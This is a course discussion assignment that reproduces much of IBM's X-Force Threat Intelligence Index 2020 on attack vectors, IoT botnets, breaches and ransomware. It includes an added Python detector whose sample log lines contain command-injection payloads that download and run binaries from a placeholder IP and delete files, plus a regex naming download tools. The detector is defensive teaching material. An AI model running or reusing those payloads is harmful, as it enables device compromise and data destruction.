Open and review the 2020 IBM X-Force Threat Intelligence Index [PDF].
- Describe the purpose of this report and how this information would be useful to a business.
- Provide insightful reasoning on why:
  - Phishing decreased from nearly half of the total incidents in 2018 to less than a third by 2019, while scanning and exploitation of vulnerabilities increased to nearly a third of the incidents up from only eight percent in 2018.
  - Ransomware and building out botnets have returned significantly to the malware landscape.
After reading a few of your classmates' postings, reply to those from which you learned something new or to which you have something constructive to add. For example:
- Discuss what you learned.
- Ask probing questions or seek clarification.
- Explain why you agree or disagree with your classmate's main points, assertions, assumptions, or conclusions.
- Suggest research strategies or specific resources on the topic.
Be sure to respond to at least one of your classmates' postings. Join the discussion early and post often.
X-Force Threat Intelligence Index 2020
Produced by IBM X-Force Incident Response and Intelligence Services (IRIS)
Table of Contents
- Summary and Key Trends
- Targeting and Initial Infection Vectors
  - Explosive Growth in Operational Technology (OT) Infrastructure Targeting
  - Records Breached Grows Dramatically
  - Targeting of IoT Devices Includes Enterprise Realms
  - Phishing Tops Initial Access Vectors in 2019 Attacks
- Malware Trends
  - Destructive Malware Attacks Dramatically Increase
  - Ransomware and Cryptominers Aggressive in 2019
  - Top Innovators in 2019 Malware Code Evolution
  - Banking Trojans and Ransomware – A Treacherous Matrimony That Keeps Getting Worse
- Spam and Phishing Trends
  - 2017 Vulnerabilities Continue to Star in 2019 Spam
  - Spam Botnets Hosted in the West, Impact Globally
  - Spam Victims by Geography
  - Blocked Malicious Domains Highlight Prevalence of Anonymization Services
  - Phishing Impersonated Tech Companies, Social Media
  - Top 10 Spoofed Brands
- Most Frequently Targeted Industries
  - Finance and Insurance
  - Retail
  - Transportation
  - Media & Entertainment
  - Professional Services
  - Government
  - Education
  - Manufacturing
  - Energy
  - Healthcare
- Geo-Centric Insights
  - North America
  - Asia
  - Europe
  - Middle East
  - South America
- Preparing for Resilience in 2020
- Moving Forward with Key Takeaways
- About X-Force
Part 1
Summary and Key Trends
IBM Security develops intelligent enterprise security solutions and services to help your business build resilience today for the cybersecurity threats of tomorrow.
To update security professionals about the most relevant threats, IBM X-Force regularly releases blogs, white papers, webinars, and podcasts about emerging threats and attackers’ Tactics, Techniques and Procedures (TTPs).
IBM Security releases the IBM X-Force Threat Intelligence Index annually, summarizing the year past in terms of the most prominent threats raised by our various research teams to provide security teams with information that can help better secure their organizations.
Data and insights presented in this report are derived from IBM Security managed security services, incident response services, penetration testing engagements, and vulnerability management services.
IBM X-Force research teams analyze data from hundreds of millions of protected endpoints and servers, along with data derived from non-customer assets such as spam sensors and honeynets. IBM Security Research also runs spam traps around the world and monitors tens of millions of spam and phishing attacks daily, analyzing billions of web pages and images to detect attack campaigns, fraudulent activity, and brand abuse, to better protect our customers and the connected world we live in.
IBM Security
X-Force Incident Response and Intelligence Services (IRIS) compiled IBM Security software and security services analyses from the past year, which show that 2019 was a year of reemerging old threats being used in new ways.
— According to X-Force data, a 2000 percent increase in operational technology (OT) targeting incidents in 2019 could portend the rising interest of threat actors to attack industrial systems as we move into 2020.
— Over 8.5 billion records were compromised in 2019, a number that’s more than 200 percent greater than the number of records lost in 2018. The inadvertent insider can largely be held responsible for this significant rise. Records exposed due to misconfigured servers (including publicly accessible cloud storage, unsecured cloud databases, and improperly secured rsync backups, or open internet-connected network area storage devices) accounted for 86 percent of the records compromised in 2019.
— The malware landscape shifted in 2019, with threat actors returning to ransomware and building out botnets. Throughout 2019, X-Force IRIS responded to ransomware engagements in 12 different countries in 5 different continents and across 13 different industries. Additionally, destructive malware activity shows that this potentially catastrophic malware trend continues to be a rising threat.
— The top three initial infection vectors seen in X-Force IRIS engagements in 2019 were a very close first, second, and third: Phishing (31 percent), Scan and Exploit (30 percent) and Stolen Credentials (29 percent). Phishing, most notably, went from making up nearly half of the total incidents in 2018 to less than a third in 2019. By contrast, the scanning and exploitation of vulnerabilities increased to nearly one-third of the incidents from only making up eight percent in 2018.
— X-Force analysis of global spam activity indicates that spam email continues to use a limited subset of vulnerabilities, with particular focus on just two CVEs: CVE-2017-0199 and CVE-2017-11882. Both of these are patched vulnerabilities that have accounted for nearly 90 percent of the vulnerabilities threat actors attempted to exploit via spam campaigns.
— Though Financial Services retained its top spot as the most targeted sector in 2019, industry-specific targeting highlighted shifting priorities for threat actors, with Retail, Media, Education, and Government all moving up on the global chart of the most targeted sectors.
— New to the X-Force Threat Intelligence Index this year are geo-centric insights, providing data on observed trends from around the world. IBM Security continues to track multiple threat actors targeting all geographies, and this report highlights key threat actors targeting each region, observed attacks from 2019, and potential dates of cybersecurity interest in 2020.
The following sections of this annual report go over the top-level trends and drill down to information on what shaped them in 2019.
Part 2
Targeting and Initial Infection Vectors
Figure 1: Operational technology (OT) attack trends. Monthly OT attack volume, January to November, comparing the years 2016 to 2019 (Source: IBM X-Force). [Chart not reproduced.]
Explosive Growth in Operational Technology (OT) Infrastructure Targeting
IBM X-Force data indicates that events in which threat actors targeted Industrial Control Systems (ICS) and similar Operational Technology (OT) assets increased over 2000 percent since 2018. In fact, the number of events targeting OT assets in 2019 was greater than the activity volume observed in the past three years.
Most of the observed attacks were centered around using a combination of known vulnerabilities within SCADA and ICS hardware components, as well as password-spraying attacks using brute force login tactics against ICS targets.
Some reported activity focused on ICS attacks has been associated with two known threat actors, and coincided with the spike in the attack timeline we observed in our telemetry. Two specific campaigns were carried out by the Xenotime group and by IBM Hive0016 (APT33), which reportedly broadened their attacks on ICS targets.
The overlap between IT infrastructure and OT, such as Programmable Logic Controllers (PLCs) and ICS, continued to present a risk to organizations that relied on such hybrid infrastructures in 2019.
The convergence of IT/OT infrastructure allows IT breaches to target OT devices controlling physical assets, which can greatly increase the cost to recover. For example, in early 2019, IBM X-Force IRIS assisted in responding to a breach at a global manufacturing company, where a ransomware infection starting on an IT system moved laterally into OT infrastructure and brought plant operations to a halt. The attack impacted not only the company’s own operations but also caused a ripple effect in global markets.
X-Force IRIS security assessments delivered to our customers through 2019 highlighted the vulnerability of OT systems, which often use legacy software and hardware. Keeping production systems that can no longer be patched, and that carry older vulnerabilities that have long been public, means that even OT systems that are not internet-facing may be easy prey. In cases of lateral movement, after an attacker gains the first foothold, these systems can be accessed from inside the network and harmed by relatively simple exploitation techniques.
Although the ICS network attack trend shown in Figure 1 has been in a downward motion since early October 2019, X-Force expects that attacks against OT/ICS targets will continue to increase in 2020, as various threat actors plot and launch new campaigns against industrial networks across the globe. With more than 200 new ICS-related CVEs released in 2019, IBM X-Force’s vulnerability database shows that threats to ICS will likely continue to grow in 2020.
Records Breached Grows Dramatically
The number of breached records jumped significantly in 2019 with over 8.5 billion records exposed – more than three times greater than 2018 year-over-year. The number one reason for this significant rise is that records exposed due to misconfigurations increased nearly tenfold year-over-year. These records made up 86 percent of the records compromised in 2019. This is a stark departure from what we reported in 2018, when we observed a 52 percent decrease from 2017 in records exposed due to misconfigurations and these records made up less than half of total records.
Notably, there was actually a decrease in the number of misconfiguration incidents in 2019 of 14 percent year-over-year. This fact implies that when a misconfiguration breach did occur, the number of records affected was significantly greater in 2019. Nearly three-quarters of the breaches where there were more than 100 million records breached were misconfiguration incidents. In two of those misconfiguration incidents, which occurred in the Professional Services sector, the exposed record count was in the billions for each incident.
This significant increase in lost records across industries highlights the growing risk of data breaches, even for organizations in sectors that were not typically considered prime targets.
Figure 2: Consumer vs. enterprise IoT attacks. Monthly volume of consumer vs. enterprise IoT attacks in 2019, January to November (Source: IBM X-Force). [Chart not reproduced.]
Targeting of IoT Devices Includes Enterprise Realms
With over 38 billion devices expected to be connected to the internet in 2020, the Internet of Things (IoT) threat landscape has been gradually shaping up to be one of the threat vectors that can affect both consumers and enterprise level operations by using relatively simplistic malware and automated, often scripted, attacks.
Within the sphere of malicious code used to infect IoT devices, IBM X-Force research has tracked multiple Mirai malware campaigns in 2019 that have notably shifted from targeting consumer electronics to targeting enterprise-grade hardware as well – activity that we did not observe in 2018. Compromised devices with network access can be used by attackers as a pivoting point in potential attempts to establish a foothold in the organization.
Mirai is a prolific IoT malware that has been used in the hands of multiple attackers since 2016 to cause mass disruption by infecting large numbers of IoT devices and using them in distributed denial of service (DDoS) attacks. In our analysis of 2019 campaigns, we have found that TTPs of those wielding the Mirai malware have robustly changed since 2018, and in 2019 focused on targeting enterprise hardware in addition to consumer electronics.
Looking into attacks that affected IoT devices in 2019, we have observed the widespread use of command injection (CMDi) attacks containing instructions to download malicious payloads targeting various types of IoT devices. Most of these injection attacks are automated by scripts that scan for and attempt to infect devices en masse. If the targeted IoT device is susceptible to these injection attacks, the payload is downloaded and executed, effectively drafting the device into a large IoT botnet. One of the most common enablers of these attacks is IoT devices with weak or default passwords that can be easily guessed by a humble dictionary attack.
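As an added example, not code from the report or from IBM, here is a small Python detector that runs over constructed access log lines and flags the injection pattern described above: a shell operator chained onto a request parameter, followed by a download tool and, usually, execution of what was fetched. The log lines, addresses, paths and payload host are all constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache/nginx-style access log lines (not taken from the report).
# They mimic the automated IoT command-injection attempts described above:
# shell commands chained onto a request parameter that fetch and run a payload.
# All addresses are documentation ranges; paths and file names are invented.
SAMPLE_LOG = """\
203.0.113.5 - - [12/Jun/2019:03:14:07 +0000] "GET /cgi-bin/luci?cmd=%3Bwget%20http%3A%2F%2F198.51.100.9%2Fbins%2Fx86%3Bchmod%20777%20x86%3B.%2Fx86 HTTP/1.1" 404 153
198.51.100.77 - - [12/Jun/2019:03:14:09 +0000] "POST /apply.cgi HTTP/1.1" 200 87
192.0.2.10 - - [12/Jun/2019:03:15:01 +0000] "GET /index.html HTTP/1.1" 200 2048
203.0.113.5 - - [12/Jun/2019:03:16:22 +0000] "GET /shell?cd+/tmp;rm+-rf+*;curl+http://198.51.100.9/bot.sh+-O;sh+bot.sh HTTP/1.1" 400 0
192.0.2.44 - - [12/Jun/2019:03:17:45 +0000] "GET /search?q=wget+tutorial HTTP/1.1" 200 512
"""

# Common log format: client, ident, user, [timestamp], "METHOD target PROTO", status, size.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)
# A shell operator (; | & or backtick) immediately followed by a download tool.
# The operator is what separates an injected command from a harmless parameter
# value that merely contains the word "wget".
DOWNLOAD_RE = re.compile(
    r'[;|&`]\s*(?:busybox\s+)?(?P<tool>wget|curl|tftp|ftpget)\b', re.IGNORECASE
)
# Signs that the fetched file is then executed (chmod, sh/bash, or ./file).
EXEC_RE = re.compile(r'\b(?:chmod|sh|bash)\b|\./', re.IGNORECASE)


def decode_target(target: str) -> str:
    """URL-decode the request target twice, so double-encoded payloads also surface."""
    return unquote_plus(unquote_plus(target))


def inspect_line(line: str):
    """Return a finding dict for a CMDi download attempt, or None for benign/unparseable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = decode_target(m.group("target"))
    hit = DOWNLOAD_RE.search(target)
    if not hit:
        return None
    # Flag regardless of HTTP status: a 404 only shows this path was absent, and
    # mass scanners retry the same injection against many paths and devices.
    return {
        "src": m.group("src"),
        "status": int(m.group("status")),
        "tool": hit.group("tool").lower(),
        "executes": bool(EXEC_RE.search(target)),
        "decoded": target,
    }


def scan_log(text: str) -> list:
    """Run inspect_line over every line and keep the findings."""
    return [f for f in (inspect_line(l) for l in text.splitlines()) if f]


def sources_by_hits(findings: list) -> dict:
    """Count findings per source address; repeat offenders point at scripted scanning."""
    counts: dict = {}
    for f in findings:
        counts[f["src"]] = counts.get(f["src"], 0) + 1
    return counts


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['src']} status={f['status']} tool={f['tool']} executes={f['executes']}")
        print("   ", f["decoded"])
    print("hits per source:", sources_by_hits(scan_log(SAMPLE_LOG)))
```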
Figure 3: Top initial access vectors. Breakdown of the top 6 initial attack vectors in 2019, as a percentage of the six access vectors shown (Source: IBM X-Force):
- Phishing: 31%
- Scan and exploit: 30%
- Unauthorized use of credentials: 29%
- Brute force attack: 6%
- Mobile device compromise: 2%
- Watering hole: 1%
Phishing Tops Initial Access Vectors in 2019 Attacks
IBM X-Force IRIS’s extensive incident response capability provides valuable insight on attacker methods and motivations.
At 31 percent, phishing was the most frequent vector used for initial access in 2019, but that is down from 2018, when it comprised nearly half of the total.[1]
[1] The 2019 X-Force Threat Intelligence Index reported that nearly one-third—29 percent—of attacks analyzed by X-Force IRIS involved compromises via phishing emails. This number has since been adjusted to account for additional evidence that surfaced post publication for several incidents, increasing that percentage to 44 percent for 2018.
Most notably in 2019, attackers increasingly scanned target environments for vulnerabilities to exploit, with incident responders finding this technique used in 30 percent of incidents – up from only 8 percent of total incidents the previous year.
Threat actors have plenty of choices on what to scan and exploit, with IBM X-Force tracking over 150,000 vulnerabilities that have been publicly disclosed. While sophisticated adversaries may develop zero-day exploits, relying on known exploits occurs more frequently as such exploits allow adversaries to gain an initial foothold without having to expend resources to craft new TTPs, saving their best weapons for the most heavily defended networks. Furthermore, attackers bank on organizations not keeping up-to-date with their patch application, even for vulnerabilities where patches have been available for some time. For example, instances of WannaCry infection continue to be observed more than two years since the initial infection and the patch (MS17-010) becoming widely available.
The use of stolen credentials, where threat actors use previously obtained credentials to access target organizations, came in at a close third at 29 percent. Often these credentials may be stolen from a third-party site or obtained via a phishing attempt against the targeted organization. Threat actors can use stolen credentials to blend in with legitimate traffic, making detection even more challenging.
Brute force attacks dropped year-over-year to a distant fourth position with 6 percent of all cases, followed by BYOD devices at 2 percent as the initial access point into targeted organizations.
X-Force researchers observed a notable uptick in threat actor activity in June and July of 2019, with the number of events eclipsing totals for all of 2019 to that point. While the reason for this sudden surge in activity is unknown, the summer months appear to be more active in terms of spam as well, with peak spam volume recorded in August of 2019. It’s possible that threat actors were simply noisier and more easily detected, or that a change in threat actor tactics or tools generated significant activity. Short-term peaks of activity are less likely to be the result of new threat actors entering the market, as such new entries would be expected to create a sustained increase in activity rather than a temporary spike.
Part 3
Malware trends
Destructive Malware Attacks Dramatically Increase
IBM X-Force IRIS investigations indicate that destructive malware attacks became more frequent and increased in geography and scope through 2019.
Wielded by both cybercriminals and nation-state actors, destructive malware is malicious software with the capability to render affected systems inoperable and challenge reconstitution. Most destructive malware variants cause destruction through the deletion or overwriting of files that are critical to the operating system’s ability to run. In a few cases, destructive malware may send tailored messages to industrial equipment to cause malfunction. Included in our definition of destructive malware is the type of ransomware that’s capable of wiping data from machines or irreversibly encrypting data on a machine.
Between the second half of 2018 and the second half of 2019 X-Force IRIS responded to the same number of destructive attacks year-over-year, highlighting that this potentially catastrophic malware trend continues to put organizations at risk.
Historically, destructive attacks typically came from nation-state adversaries. However, we have been observing a trend where more strains of financially-motivated ransomware are incorporating destructive elements into the attack, with variants such as LockerGoga and MegaCortex making their destructive attack debuts in late 2018 and early 2019.
In late 2019, X-Force IRIS highlighted the discovery of a new destructive malware we named ZeroCleare. This wiper targeted the energy sector in the Middle East and was attributed by IBM to an Iran-affiliated APT group ITG13[2], also known as APT34/OilRig.
X-Force IRIS estimates that the cost of a destructive malware attack to companies can be particularly high, with large multinational companies incurring a cost of $239 million per incident, on average. This cost estimate is over 60 times greater than the average 2019 cost of a data breach as calculated by the Ponemon Institute. Unlike data breaches that steal or expose data, destructive attacks typically see the destruction of up to three-quarters or more of devices on the victimized organization’s networks.
[2] ITG stands for IBM Threat Group, a term which is further discussed in the Most Frequently Targeted Industries section. X-Force uses ITG names, with alternate names for threat groups indicated in parentheses after the ITG name.
Ransomware and Cryptominers Aggressive in 2019
The counts of malware variants and attacks using malware trend up and down through the year, but nonetheless, insight into the types of threats that should take priority can help organizations better manage risk.
In the first half of 2019, approximately 19 percent of attacks we observed were related to ransomware incidents, compared to only 10 percent of attacks in the second half of 2018. In Q4 2019 there was a 67 percent increase in ransomware engagements compared to Q4 the previous year. Throughout 2019, X-Force IRIS responded to ransomware engagements in 12 different countries in 5 different continents and across 13 different industries.
This surge may be attributed to growing numbers of threat actors and campaigns launched against a variety of organizations in 2019. Of note were municipal and public institutions that suffered ransomware attacks, as well as local government agencies and healthcare providers. Attacks on these types of organizations often caught them unprepared to respond, more likely to pay a ransom, and in some cases under extreme stress to recover from the attack due to threat to public safety and human life.
X-Force data shows that in the cases of ransomware attacks, the top attack vector in 2019 was attempted exploits against vulnerabilities in the Windows Server Message Block (SMB) protocol to propagate through the network. This tactic, which was used previously in WannaCry attacks, accounted for over 80 percent of observed attack attempts.